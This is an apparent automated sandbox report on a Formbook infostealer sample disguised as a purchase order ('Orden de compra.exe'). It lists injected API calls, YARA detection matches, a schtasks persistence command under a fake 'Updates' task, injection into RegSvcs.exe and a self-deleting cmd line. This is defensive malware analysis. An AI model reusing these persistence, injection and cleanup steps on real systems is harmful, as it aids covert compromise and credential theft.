          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF99D0 NtCreateProcessEx,4_2_00FF99D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9950 NtQueueApcThread,4_2_00FF9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9A80 NtOpenDirectoryObject,4_2_00FF9A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9A10 NtQuerySection,4_2_00FF9A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FFA3B0 NtGetContextThread,4_2_00FFA3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9B00 NtSetValueKey,4_2_00FF9B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF95F0 NtQueryInformationFile,4_2_00FF95F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9560 NtWriteFile,4_2_00FF9560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FFAD30 NtSetContextThread,4_2_00FFAD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9520 NtWaitForSingleObject,4_2_00FF9520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF96D0 NtCreateKey,4_2_00FF96D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9670 NtQueryInformationProcess,4_2_00FF9670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9650 NtQueryValueKey,4_2_00FF9650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9610 NtEnumerateValueKey,4_2_00FF9610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9FE0 NtCreateMutant,4_2_00FF9FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9770 NtSetInformationFile,4_2_00FF9770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FFA770 NtOpenThread,4_2_00FFA770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9760 NtOpenProcess,4_2_00FF9760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9730 NtQueryVirtualMemory,4_2_00FF9730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FFA710 NtOpenProcessToken,4_2_00FFA710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99860 NtQuerySystemInformation,LdrInitializeThunk,8_2_04A99860
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99840 NtDelayExecution,LdrInitializeThunk,8_2_04A99840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A999A0 NtCreateSection,LdrInitializeThunk,8_2_04A999A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A995D0 NtClose,LdrInitializeThunk,8_2_04A995D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04A99910
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99540 NtReadFile,LdrInitializeThunk,8_2_04A99540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A996E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04A996E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A996D0 NtCreateKey,LdrInitializeThunk,8_2_04A996D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04A99660
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A50 NtCreateFile,LdrInitializeThunk,8_2_04A99A50
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99650 NtQueryValueKey,LdrInitializeThunk,8_2_04A99650
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99780 NtMapViewOfSection,LdrInitializeThunk,8_2_04A99780
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99FE0 NtCreateMutant,LdrInitializeThunk,8_2_04A99FE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99710 NtQueryInformationToken,LdrInitializeThunk,8_2_04A99710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A998A0 NtWriteVirtualMemory,8_2_04A998A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A998F0 NtReadVirtualMemory,8_2_04A998F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99820 NtEnumerateKey,8_2_04A99820
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9B040 NtSuspendThread,8_2_04A9B040
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A995F0 NtQueryInformationFile,8_2_04A995F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A999D0 NtCreateProcessEx,8_2_04A999D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99520 NtWaitForSingleObject,8_2_04A99520
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9AD30 NtSetContextThread,8_2_04A9AD30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99560 NtWriteFile,8_2_04A99560
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99950 NtQueueApcThread,8_2_04A99950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A80 NtOpenDirectoryObject,8_2_04A99A80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A20 NtResumeThread,8_2_04A99A20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A00 NtProtectVirtualMemory,8_2_04A99A00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99610 NtEnumerateValueKey,8_2_04A99610
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A10 NtQuerySection,8_2_04A99A10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99670 NtQueryInformationProcess,8_2_04A99670
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A997A0 NtUnmapViewOfSection,8_2_04A997A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9A3B0 NtGetContextThread,8_2_04A9A3B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99730 NtQueryVirtualMemory,8_2_04A99730
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99B00 NtSetValueKey,8_2_04A99B00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9A710 NtOpenProcessToken,8_2_04A9A710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99760 NtOpenProcess,8_2_04A99760
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99770 NtSetInformationFile,8_2_04A99770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9A770 NtOpenThread,8_2_04A9A770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA050 NtClose,8_2_005AA050
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA100 NtAllocateVirtualMemory,8_2_005AA100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A9F20 NtCreateFile,8_2_005A9F20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A9FD0 NtReadFile,8_2_005A9FD0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA04A NtClose,8_2_005AA04A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA01A NtReadFile,8_2_005AA01A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA0FA NtAllocateVirtualMemory,8_2_005AA0FA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A9FCC NtReadFile,8_2_005A9FCC
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_00A966480_2_00A96648
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_00A999B00_2_00A999B0
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_00A966390_2_00A96639
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_00A9C8A80_2_00A9C8A8
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_00A996700_2_00A99670
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_05776BC00_2_05776BC0
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_0577C1380_2_0577C138
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_057761A80_2_057761A8
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_057761980_2_05776198
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_057700400_2_05770040
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_057700070_2_05770007
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_05776BB10_2_05776BB1
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_057702920_2_05770292
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041D1634_2_0041D163
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041D1664_2_0041D166
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041D9B94_2_0041D9B9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041DB4B4_2_0041DB4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041DC864_2_0041DC86
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402D8A4_2_00402D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409E2B4_2_00409E2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409E304_2_00409E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FE20A04_2_00FE20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FCB0904_2_00FCB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010710024_2_01071002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0108E8244_2_0108E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010820A84_2_010820A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FD41204_2_00FD4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010828EC4_2_010828EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FBF9004_2_00FBF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01082B284_2_01082B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0107DBD24_2_0107DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010703DA4_2_010703DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FEEBB04_2_00FEEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010822AE4_2_010822AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01082D074_2_01082D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01081D554_2_01081D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010825DD4_2_010825DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FC841F4_2_00FC841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FCD5E04_2_00FCD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0107D4664_2_0107D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FE25814_2_00FE2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FB0D204_2_00FB0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0108DFCE4_2_0108DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FD6E304_2_00FD6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01081FF14_2_01081FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0107D6164_2_0107D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01082EF74_2_01082EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A820A08_2_04A820A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B220A88_2_04B220A8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A6B0908_2_04A6B090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B110028_2_04B11002
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A6841F8_2_04A6841F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A825818_2_04A82581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A6D5E08_2_04A6D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A50D208_2_04A50D20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A741208_2_04A74120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A5F9008_2_04A5F900
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B22D078_2_04B22D07
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B21D558_2_04B21D55
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B222AE8_2_04B222AE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B22EF78_2_04B22EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A76E308_2_04A76E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A8EBB08_2_04A8EBB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B21FF18_2_04B21FF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B22B288_2_04B22B28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AD1638_2_005AD163
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AD1668_2_005AD166
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005ADB488_2_005ADB48
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00592D908_2_00592D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00592D8A8_2_00592D8A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00599E308_2_00599E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00599E2B8_2_00599E2B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00592FB08_2_00592FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FBB150 appears 39 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04A5B150 appears 35 times
          Source: Orden de compra.exeBinary or memory string: OriginalFilename vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameexag vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.346473645.0000000005E30000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.346473645.0000000005E30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000000.327245802.0000000000042000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5a0H.exe6 vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.346049205.0000000005D30000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Orden de compra.exe
          Source: Orden de compra.exe, 00000000.00000002.345646763.0000000005600000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs Orden de compra.exe
          Source: Orden de compra.exeBinary or memory string: OriginalFilename5a0H.exe6 vs Orden de compra.exe
          Source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@4/3
          Source: C:\Users\user\Desktop\Orden de compra.exeFile created: C:\Users\user\AppData\Roaming\HPQeEdeqeuYypt.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_01
          Source: C:\Users\user\Desktop\Orden de compra.exeMutant created: \Sessions\1\BaseNamedObjects\TXXpnYSTVSFTd
          Source: C:\Users\user\Desktop\Orden de compra.exeFile created: C:\Users\user\AppData\Local\Temp\tmp97AC.tmpJump to behavior
          Source: Orden de compra.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Orden de compra.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Orden de compra.exeReversingLabs: Detection: 16%
          Source: C:\Users\user\Desktop\Orden de compra.exeFile read: C:\Users\user\Desktop\Orden de compra.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Orden de compra.exe 'C:\Users\user\Desktop\Orden de compra.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Orden de compra.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Orden de compra.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: RegSvcs.exe, 00000004.00000002.384491568.0000000000B5A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.371533234.000000000E620000.00000002.00000001.sdmp
          Source: Binary string: RegSvcs.pdb, source: wscript.exe, 00000008.00000002.595145655.0000000004F5F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.384819265.0000000000F90000.00000040.00000001.sdmp, wscript.exe, 00000008.00000002.594715454.0000000004B4F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, wscript.exe
          Source: Binary string: wscript.pdb source: RegSvcs.exe, 00000004.00000002.384491568.0000000000B5A000.00000004.00000020.sdmp
          Source: Binary string: RegSvcs.pdb source: wscript.exe, 00000008.00000002.595145655.0000000004F5F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.371533234.000000000E620000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_00042E84 push ecx; iretd 0_2_00042E85
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_00047585 push edi; ret 0_2_0004758E
